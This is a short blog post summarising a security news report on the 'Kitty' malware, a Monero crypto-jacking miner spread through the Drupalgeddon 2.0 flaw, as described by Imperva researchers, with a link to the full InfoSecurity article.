Crypto Me0wing Attacks: Kitty Cashes in on Monero

The internet has been the gateway to fame for many a cat, but the latest vulnerability, the "Kitty" malware, has gained popularity for more nefarious reasons.
The critical remote code execution (RCE) vulnerability is an attack variant piggybacking on the Drupalgeddon 2.0 exploit.

Researchers at Imperva reported a new technique in the crypto-jacking attack trend. “During the inspection of the attacks blocked by our systems, we came across the ‘Kitty’ malware, an advanced Monero cryptocurrency miner, utilizing a ‘webminerpool,’ an open source mining software for browsers,” Imperva wrote.

Once executed, the Kitty script uses a backdoor independent of the Drupal vulnerability to establish control. A time-based job scheduler periodically re-downloads and executes a Bash script from a remote host so that the attacker can quickly make updates and changes to the infected servers.

Read entire article Cyrpto-Me0wing, Not a Cute Kitty of the Internet | InfoSecurity

Leave a comment

%d bloggers like this: